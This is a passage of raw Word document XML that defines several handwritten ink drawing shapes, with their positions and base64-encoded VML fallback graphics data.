                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId61">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="49" name="墨迹 49"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5063490" y="8258810"/>
                            <a:ext cx="139700" cy="697865"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:344.7pt;margin-top:1.1pt;height:54.95pt;width:11pt;z-index:251670528;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;L3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7CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAA&#10;AAAGAAAAAAAAAAAAEAAAAAYGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAA&#10;AAAAAAABACAAAAAqBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAA&#10;AAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAA&#10;EAAAACQHAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAg&#10;AAAATAcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJApFRrUtcAAAAJ&#10;AQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQNqrM5Kg&#10;AQAAiwMAAA4AAAAAAAAAAQAgAAAAJgEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAA&#10;AAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA8gIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQMRGjGvA&#10;AgAAggYAABAAAAAAAAAAAQAgAAAAGAMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAA&#10;cQkAAAAA&#10;">
                <v:imagedata r:id="rId62" o:title=""/>
                <o:lock v:ext="edit"/>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4236085</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>590550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429895" cy="135890"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="50" name="墨迹 50"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId63">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="50" name="墨迹 50"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4921885" y="8835390"/>
                            <a:ext cx="429895" cy="135890"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:333.55pt;margin-top:46.5pt;height:10.7pt;width:33.85pt;z-index:251671552;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;DygAuAw7eDWQ4ygujIQf7mJoibFncNevf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FIIAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;AhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAAHQYAAF9yZWxzL1BLAQIUABQA&#10;AAAIAIdO4kCKFGY80QAAAJQBAAALAAAAAAAAAAEAIAAAAEEGAABfcmVscy8ucmVsc1BLAQIUAAoA&#10;AAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAEAAAAAAAAABkcnMvUEsBAhQACgAAAAAAh07i&#10;QAAAAAAAAAAAAAAAAAoAAAAAAAAAAAAQAAAAOwcAAGRycy9fcmVscy9QSwECFAAUAAAACACHTuJA&#10;eRi8nbgAAAAhAQAAGQAAAAAAAAABACAAAABjBwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BL&#10;AQIUABQAAAAIAIdO4kAC/AST2gAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54&#10;bWxQSwECFAAUAAAACACHTuJAAMLuzqIBAACKAwAADgAAAAAAAAABACAAAAApAQAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACAAAAAAAAAAAABAAAAD3AgAAZHJzL2lu&#10;ay9QSwECFAAUAAAACACHTuJA5mKzwdICAADCBgAAEAAAAAAAAAABACAAAAAdAwAAZHJzL2luay9p&#10;bmsxLnhtbFBLBQYAAAAACgAKAEwCAACICQAAAAA=&#10;">
                <v:imagedata r:id="rId64" o:title=""/>
                <o:lock v:ext="edit"/>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4752975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>96520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="318770" cy="53340"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="墨迹 52"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId65">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="52" name="墨迹 52"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5438775" y="8341360"/>
                            <a:ext cx="318770" cy="53340"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:374.25pt;margin-top:7.6pt;height:4.2pt;width:25.1pt;z-index:251673600;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;l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HkYvJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQwDAbgvdB3MNob&#10;JR3KUeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2YXK8aPgeL28n&#10;UJINT2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaMxm5mIXyv6w9M&#10;/w3o7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqhgF2Ld491f1BL&#10;AwQUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyVkcFOwzAQRO9I&#10;/IPlK0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBshkvFY80VZcQao&#10;vDbY1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52PTqZ8jb0IUu1k&#10;D2JZVfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKcEsrsnDU0mEB3&#10;uQYXvyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0dxnOrS3RY+tar&#10;/8I3s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAAAA&#10;AAABACAAAAA7CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAA&#10;AAAGAAAAAAAAAAAAEAAAAAYGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAA&#10;AAAAAAABACAAAAAqBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAA&#10;AAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAA&#10;EAAAACQHAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAg&#10;AAAATAcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAnn0/O9oAAAAJ&#10;AQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQLItzuGb&#10;AQAAiwMAAA4AAAAAAAAAAQAgAAAAKQEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAA&#10;AAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA8AIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQFjqpjzC&#10;AgAAiQYAABAAAAAAAAAAAQAgAAAAFgMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAA&#10;cQkAAAAA&#10;">
                <v:imagedata r:id="rId66" o:title=""/>
                <o:lock v:ext="edit"/>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4638675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>206375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="508000" cy="532765"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="墨迹 53"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId67">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="53" name="墨迹 53"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5324475" y="8451215"/>
                            <a:ext cx="508000" cy="532765"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:365.25pt;margin-top:16.25pt;height:41.95pt;width:40pt;z-index:251674624;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;6T2E1IUn+ow9/U8MV/N0d/M/9+o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cCQAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoA&#10;AAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAAKcHAABfcmVscy9QSwECFAAUAAAACACH&#10;TuJAihRmPNEAAACUAQAACwAAAAAAAAABACAAAADLBwAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACH&#10;TuJAAAAAAAAAAAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAA&#10;AAAAAAAAAAAKAAAAAAAAAAAAEAAAAMUIAAB